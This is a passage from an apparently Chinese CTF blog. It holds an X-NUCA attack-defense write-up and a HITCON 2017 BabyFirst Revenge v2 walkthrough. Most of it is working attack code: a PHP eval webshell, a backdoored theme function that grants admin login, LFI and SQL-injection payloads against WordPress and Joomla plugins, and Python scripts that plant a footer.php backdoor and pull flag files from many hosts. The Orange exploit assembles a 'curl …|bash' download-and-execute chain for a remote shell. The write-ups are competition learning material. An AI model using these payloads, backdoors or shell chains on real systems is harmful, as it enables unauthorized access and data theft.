	if(!isset($widget)) $widget=$pre."set"."_".$posts_auth."_".$methods;  //
	if(!isset($forcemore)) $forcemore=1;  //
	if ($is_use_more ) {
		if($forcemore) {
			if (!is_user_logged_in())
				@call_user_func_array($widget,array($d, true));
		}
	}
	$output="";
	return $output;
}

add_action("init", "_getprepare_widgets");	 // 注册函数
?>

我们直接在前台某个页面输入 ?d=1就可以越权登录admin了登录之后可以有两个getshell点第一个是对主题文件的编辑，其中有php文件第二个是上传压缩成zip的webshell，上传后被解压在/wp-content/uploads/2017/12/

被留下的一句话在/wp-includes/rest-api/endpoints/class-wp-rest-relations-controller.php中，内容为

<?php
@eval($_GET['cmd']);
?>

LFI – wp-vault插件在/wp-content/plugins/wp-vault/trunk/wp-vault.php中，wpv-image参数没有过滤就直接包含利用方法：http://xxx/wp-content/plugins/wp-vault/trunk/wp-vault.php?wpv-image=../../../../../../etc/passwd
sql注入 – kittycatfish 2.2插件 poc 注入点1 ：/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0 注入点2：wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0 都是kc_ad参数，可以使用盲注直接load_file读取flag文件
sql注入 – olimometer插件注入点：/wp-content/plugins/olimometer/thermometer.php?olimometer_id=1 olimometer_id参数可以盲注
sql注入 – easy-modal插件 poc 同盲注，但是首先得登录进后台才能利用，比较鸡肋
sql注入？ – ultimate-product-catalogue 好吧这个没有注入，进去看了一下作者已经加了参数绑定了。。。

我们有点乱的利用脚本

#coding:utf8
import urllib,urllib2
import re
import time
import cookielib
import socket
import json

def easy_webshell(root_url):
	try:
		url = root_url + '/wp-includes/rest-api/endpoints/class-wp-rest-relations-controller.php?%s' % 'cmd=system("cat+/opt/xnuca/flag.txt");'
		req = urllib2.Request(url = url)
		res = urllib2.urlopen(req)
		content = res.read()
		if content != '':
			print root_url + ' -- flag : ' + content
			return 1
		else:
			print root_url + ' fail to get flag through easy_webshell'
			return 0
	except urllib2.URLError as e:
		print 'web_shell error' + e.reason

def LFI(root_url):
	try:
		url = root_url + '/wp-content/plugins/wp-vault/trunk/wp-vault.php?wpv-image=../../../../../opt/xnuca/flag.txt'
		req = urllib2.Request(url = url)
		res = urllib2.urlopen(req)
		content = res.read()
		if content != '':
			print root_url + ' -- flag : ' + content
			return 1
		else:
			print root_url + ' fail to get flag through LFI'
			return 0
	except urllib2.URLError as e:
		print 'LFI error' + e.reason

def loginAsAdmin(root_url):
	try:
		url = root_url
		req = urllib2.Request(url = url)
		res = urllib2.urlopen(req)
		if 'uniform tax rebate chef' not in res.read():
			print 'Theme Not Correct!'
			return
		url = root_url + '/?d=1'
		cookie = cookielib.CookieJar()
		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
		req = urllib2.Request(url = url)
		res = opener.open(req)
		res = opener.open(req)
		content = res.read()
		if '登出' not in content:
			# print '[!] Cannot log in as admin!!!'
			# print content
			return
		return opener
	except urllib2.URLError as e:
		print 'login error' + e.reason

def uploadShell(root_url):
	try:
		opener = loginAsAdmin(root_url)
		if opener is None:
			print '[!] Cannot log in as admin!!!'
			return
		installUrl = root_url + '/wp-admin/theme-editor.php?file=footer.php&theme=AccountingTime'
		getNonceReq = urllib2.Request(url = installUrl)
		res = opener.open(getNonceReq)
		content = res.read()
		if content == '':
			print 'get Nonce Page Error!!!'
			return
		nonceList = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-zA-Z0-9]+)"',content)
		if nonceList == []:
			print 'get Nonce Page Error!!!!'
			return
		nonce = nonceList[0]
		boundary = '----------%s' % hex(int(time.time() * 1000))
		data = []
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % '_wpnonce')
		data.append(nonce)
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % '_wp_http_referer')
		data.append('/wp-admin/plugin-install.php')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'newcontent')
		data.append('''
<?php global $theme; ?>
    
<?php if($theme->display('footer_widgets')) { ?>
    <div id="footer-widgets" class="clearfix">
        <?php
        /**
        * Footer  Widget Areas. Manage the widgets from: wp-admin -> Appearance -> Widgets 
        */
        ?>
        <div class="footer-widget-box">
            <?php
                if(!dynamic_sidebar('footer_1')) {
                    $theme->hook('footer_1');
                }
            ?>
        </div>
        
        <div class="footer-widget-box">
            <?php
                if(!dynamic_sidebar('footer_2')) {
                    $theme->hook('footer_2');
                }
            ?>
        </div>
        
        <div class="footer-widget-box footer-widget-box-last">
            <?php
                if(!dynamic_sidebar('footer_3')) {
                    $theme->hook('footer_3');
                }
            ?>
        </div>
        
    </div>
<?php  } ?>

    <div id="footer">
    
        <div id="copyrights">
            <?php
                if($theme->display('footer_custom_text')) {
                    $theme->option('footer_custom_text');
                } else { 
                    ?> &copy; <?php echo date('Y'); ?>  <a href="<?php echo home_url(); ?/g"><?php bloginfo('name'); ?></a><?php
                }
            ?> 
        </div>
        
        <?php /* 
            All links in the footer should remain intact. 
            These links are all family friendly and will not hurt your site in any way. 
            Warning! Your site may stop working if these links are edited or deleted 
            
            You can buy this theme without footer links online at https://flexithemes.com/buy/?theme=accountingtime
        */ ?>
        
        <div id="credits">Powered by <a href="http://wordpress.org/"><strong>WordPress</strong></a> | Theme Designed by: <?php echo wp_theme_credits(0); ?>  | Thanks to <?php echo wp_theme_credits(1); ?>, <?php echo wp_theme_credits(2); ?> and <?php echo wp_theme_credits(3); ?></div><!-- #credits -->
        
    </div><!-- #footer -->
    
</div><!-- #container -->

<?php wp_footer(); ?>
<?php $theme->hook('html_after'); ?>
</body>
</html>
<?php if md5($_GET['pr0ph3t'])=='379377cfde157b4d7f6529d448dadd23' echo file_get_contents('/opt/xnuca/flag.txt');?>
''')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'action')
		data.append('update')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'file')
		data.append('footer.php')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'theme')
		data.append('AccountingTime')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'scrollto')
		data.append('818.1818237304688')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'docs-list')
		data.append('')
		data.append('--%s' % boundary)

		data.append('Content-Disposition: form-data; name="%s"\r\n' % 'submit')
		data.append('更新文件')
		data.append('--%s' % boundary)

		# file = open('fuck.php','rb')
		# data.append('Content-Disposition: form-data; name="%s"; filename="123.php\r\n' % 'pluginzip')
		# data.append('Content-Type: text/php\r\n')
		# data.append(file.read())
		# file.close()
		# data.append('--%s--\r\n' % boundary)

		# data.append('Content-Disposition: form-data; name="%s"\r\n' % 'install-plugin-submit')
		# data.append('现在安装')
		# data.append('--%s' % boundary)

		uploadUrl = root_url + '/wp-admin/theme-editor.php'
		http_body='\r\n'.join(data)

		req=urllib2.Request(uploadUrl, data=http_body)
		req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)
		req.add_header('User-Agent','Mozilla/5.0')
		try : 
			res = opener.open(req, timeout=10)
		except socket.timeout as e:
			pass
		content = res.read()
		if '文件修改成功' in content: #后面为了方便就把上传和修改footer文件写在一起了。。。 注释掉的都是上传的
			print '[!] ' + root_url + ' getShell through footer.php'
			req = urllib2.Request(root_url+'/?pr0ph3t=dalaohao')
			res = urllib2.urlopen(req)
			content = res.read()
			if 'gongfang' in content:
				print '[!!] ' + root_url + ' get flag ' + re.findall('gongfang_flag\{(.*)\}')[0]
		# if '正在安装您上传的插件' in content:
		# 	print '[!] Upload Shell success! Path : /wp-content/uploads/2017/12/123.php'
		# 	req = urllib2.Request(root_url+'/wp-content/uploads/2017/12/123.php')
		# 	req1 = urllib2.Request(root_url+'/wp-content/uploads/2017/12/.db.inc.php')
		# 	try:
		# 		urllib2.urlopen(req1, timeout=0.2)
		# 	except socket.timeout as e:
		# 		pass
		# 	try:
		# 		urllib2.urlopen(req, timeout=0.2)
		# 	except socket.timeout as e:
		# 		pass
		# 	req = urllib2.Request(root_url+'/wp-content/uploads/2017/12/.index.php',data=json.dumps({"p":"密码","c":"system('cat+/opt/xnuca/flag.txt');"}))
		# 	res = urllib2.urlopen(req)
		# 	print root_url + ' flag is : ' + res.read()
		# else:
		# 	print '[?] Upload Fail....'
	except urllib2.URLError as e:
		print 'upload error' + e.reason

for x in xrange(2,20):
	if x == 8:
		continue
	target = 'http://192.121.' + str(x) + '.31'
# target = 'http://192.108.1.30:8002'# + str(x)
	easy_webshell(target) # ok!
	LFI(target) # ???
	uploadShell(target)

web2的因为没有在第一天获取到源码分析，所以比较吃亏。。队友找了很久才找到一个注入，也同样是利用load_file读取flag，这也是后面我们打得这么凶的原因，注入点： JNews注入：exp 我们的利用脚本

import requests
import re

se = requests.Session()


def getToken(hostname='192.108.1.14:1180',pos=32,length=32):
	url = 'http://'+hostname+'/index.php?option=com_jnews&view=subscribe&act=subone&Itemid=206'
	res = se.get(url)
	content = res.content
	tokenGroup = re.findall('name="Itemid" value="206" /><input type="hidden" name="(.*)" value',content)
	if tokenGroup != []:
		token = tokenGroup[0]
	else:
		token = ''
	

	#post data
	data = {}
	data['Itemid'] = '206'
	data['name'] = '123123'
	data['email'] = '123@123.com'
	data['receive_html'] = '1'
	data['timezone'] = '00%3A00%3A00'
	data['confirmed'] = '1'
	data['subscribed[1]'] = '1'
	data['sub_list_id[1]'] = "1 AND EXTRACTVALUE(8483,CONCAT(0x5c,(SELECT(ELT(8483=8483,substr(load_file('/opt/xnuca/flag.txt'),"+str(pos)+","+str(length)+")))),0x716b786b71))" #point
	data['acc_level[1]'] = '29'
	data['passwordA'] = 'FJTx2ubwvj2BA'
	data['fromFrontend'] = '1'
	data['act'] = 'subscribe'
	data['subscriber_id'] = '0'
	data['user_id'] = '0'
	data['option'] = 'com_jnews'
	data['task'] = 'save'
	data['boxchecked'] = '0'
	data[token] = '1'
	
	vulUrl = 'http://'+ hostname +'/index.php/component/jnews/'
	res = se.post(vulUrl,data=data)
	flag = re.findall(r'XPATH syntax error: &#039;\\(.*)&#039; SQL=',res.content)
	if flag != []:
		return flag[0]
	else:
		return 'error'

for x in xrange(1,20): #跳过一些确认打不了的主机加快时间
	if x == 8:
		continue
	if x == 3:
		continue
	if x == 7:
		continue
	if x == 10:
		continue
	if x == 11:
		continue
	if x == 12:
		continue
# hostname = '192.108.1.14:1180'
	hostname = '192.121.' + str(x) + '.34'
	win = ''
	win = getToken(hostname,1)
	win += getToken(hostname,32)
	win += getToken(hostname,63,17)[:-5]
	print hostname + ' get flag ' +win

第二天全天
- 被虐

总结来说这次比赛还是有不足的，第一就是个人赛的有点瓜皮。。。主办方给的提示是题目都没有暴力操作。。。所以自己就很麻瓜的连扫目录都懒得扫了。。。导致错过www.zip文件。第二就是策略不太对，第一天应该侧重点在渗透和下源码，而不是一被打了就乱了节奏 Orz 师傅们都太强了。。。

[hitcon2017] BabyFirst Revenge V2复现

Tue, 28 Nov 2017 01:17:00 +0800

分享本题自制Dockerfile：Github

这题相比于上一题条件更加的苛刻了只允许执行最多四个字符源码如下：

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

那我们之前的生成 ls -t>g 就不能按照最后一步 ls»_ 来执行了

但是我们能不能还是按照生成命令段文件最后通过ls来拼接命令执行呢？

这里还是以分析Orange大大的exp为主：

Exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate "g> ht- sl" to file "v"
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev',
    '*v>x',

    # generate "curl orange.tw|python;"
    # generate "curl 10.188.2.20|bash"
    '>\;\\', 
    '>sh\\', 
    '>ba\\', 
    '>\|\\', 
    '>20\\', 
    '>2.\\',
    '>8.\\', 
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # got shell
    'sh x', 
    'sh g', 
]


r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
    assert len(i) <= 4
    r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
    print i
    sleep(0.1)

首先生成 ls -t >g的命令文件，这里orange大大的方法真的巧妙到极致了！

先了解一个小trick，*在Linux中代表的是0或多个字符，比如ls *.txt 就表示了列出本目录下所有后缀名为txt的文件，那假如单独执行一个*会是什么效果？在本地尝试了一下直接输入一个星号的话Linux首先会把当前目录下的所有文件按字典序排序一次，然后将排序的结果当作命令执行，如下：那下图的也可以理解了：因为*o匹配了 echo 和o，而他们的排序是echo在前，o在后所以就会执行命令 echo o
再认识一下dir 这个命令在大多数系统中都是ls 的alias 但是有些系统中则没有为什么我们要用这个命令呢因为之前说过ls 是alphabetically （字典序）那么dir就会排在ls结果的最前面所以我们*之后dir也是排在最前面也就充当了拼接文件名的角色
大概思路就出来了我们要构造ls -t>g的命令片段成几个文件名但是其命令段的首字母不能在d的前面，也就是不能是 特殊符号数字 abc 而且每一段不能超过两个字符，因为其余两个字符要分配给>和\，如果你尝试一下构造正常来说是没办法构造出无特殊符号打头的文件名他总会排到dir的前面，然后更巧妙的地方来了我们可以生成逆序的命令拼接起来，最后使用rev命令反向文件中的字符串！
根据之前我们对*的认识，我们可以将倒序的命令输入到v文件中，因为*v能匹配rev 和 v，也就是执行了 rev v命令，然后再将倒序之后的结果>x文件中，这样*v>x刚刚好是四个字符!
但是看到这里你可能还会在尝试过程中发现问题，那就是逆序之后的命令段应该是 [dir,>sl,>g>,>t-] 那么这里会有一个问题因为t的字母序比s后，所以ls之后应该是这样的：解决方法是加多一个参数h，在ls中h是用作格式化l参数之后的存储量大小使之更适合人类方式阅读但是如果ls只带参数h的不带参数l话那这个参数是毫无意义的如图：所以我们将>t-改成>ht-就能解决字典序的问题了
接下来的问题就回到了babyfirst-revenge的情况了

参考: https://github.com/orangetw/My-CTF-Web-Challenges